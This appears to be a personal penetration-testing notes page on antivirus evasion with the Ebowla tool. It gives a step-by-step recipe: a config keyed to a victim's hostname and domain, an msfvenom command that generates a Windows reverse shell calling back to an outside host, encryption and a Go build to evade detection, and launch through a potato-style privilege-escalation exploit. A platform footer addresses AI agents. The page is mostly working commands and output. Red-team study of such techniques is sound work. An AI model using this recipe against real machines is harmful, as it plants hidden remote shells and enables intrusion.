> For the complete documentation index, see [llms.txt](https://squid22.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://squid22.gitbook.io/notes/windows-1/anti-virus-evasion.md).

# Anti-Virus Evasion

## GitHub Code:

{% embed url="<https://github.com/Genetic-Malware/Ebowla>" %}

Ebowla works by encoding the payload of the executable using environment variables. In this example, we are going to use the following environmental variables. This variables can be easily gathered from a victim box using **`systeminfo`**, **`hostname`**, ect....

**Hostname**: boxy01\
**Domain**: WTH

## The Config File

These are the basic things to change in order to get going with Ebowla. Basically, you specify the output type you want (GO, python or Powershell). You tell the code what kind of payload its going to be fed to the software (DLL, EXE, etc...) and finally you use specific the environment variables to have some sort of control over the way the payload gets encrypted and executed. This is extremely useful because if you just want to target a single user, you can just specify the username and the generated code won't work if executed under other usernames. However if you want to be able to use this code under all computers under a domain such as **WTH.LOCAL**, you can this as the environmental variable and the code will work on ALL computers as long as they part of the domain specified.&#x20;

![Template output](/files/-M1nFti1E8tDPSxMyfyp)

![Type of file being fed to Ebowla](/files/-M1nG2W7HyWAzBVeeFe6)

![Environment Variables](/files/-M1nGNXhBxTEpAy1UnG7)

## Our Config

```bash
# vim genetic.config

# Template output: GO, Python, OR PowerShell 
    output_type = GO 

# Type of file fed to Ebowla
payload_type = EXE 

# Enviroment variables
    [[ENV_VAR]]
    
        username = ''
        computername = 'boxy01'
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'WTH.LOCAL'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''

```

## Generate the Executable&#x20;

```bash
# Using msfvenon to generate trhe payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.2.3.4 LPORT=6666 -f exe -a x64 -o shell_6666.exe 

# Checking the File
file shell_6666.exe 
shell_6666.exe: PE32+ executable (GUI) x86-64, for MS Windows  
```

## Running Ebola with Payload

This generates the GO file.

```bash
# python ebowla.py shell_6666.exe genetic.config
[*] Using Symmetric encryption
[*] Payload length 7168
[*] Payload_type exe
[*] Using EXE payload template
[*] Used environment variables:
	[-] environment value used: computername, value used: boxy01
	[-] environment value used: userdomain, value used: wth.local
[!] Path string not used as pasrt of key
[!] External IP mask NOT used as part of key
[!] System time mask NOT used as part of key
[*] String used to source the encryption key: boxy01wth.local
[*] Applying 10000 sha512 hash iterations before encryption
[*] Encryption key: 967e1552331f3b8cccbcea0bfff30a964fb2a56953ebfbe5bd5c474d9d1a6b5c   
[*] Writing GO payload to: go_symmetric_shell_6666.exe.go

# Generated File
ls output/
go_symmetric_shell_6666.exe.go
```

## Building the Final Executable

```bash
# Build the executable from the generated GO file and write it to output/
./build_x64_go.sh output/go_symmetric_shell_6666.exe.go wth_boxy01.exe
[*] Copy Files to tmp for building
[*] Building...
[*] Building complete
[*] Copy wth_boxy01.exe to output
[*] Cleaning up
[*] Done


# ls output/
go_symmetric_shell_6666.exe.go  wth_boxy01.exe
```

## Uses for the executable

This can be easily used with Rotten Potato. You can get the exe file from this GitHub page and execute it on the target.

{% embed url="<https://decoder.cloud/2018/01/13/potato-and-tokens/>" %}

```bash
C:\path\to\execuatble\lonelypotato.exe * wth_boxy01.exe
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://squid22.gitbook.io/notes/windows-1/anti-virus-evasion.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
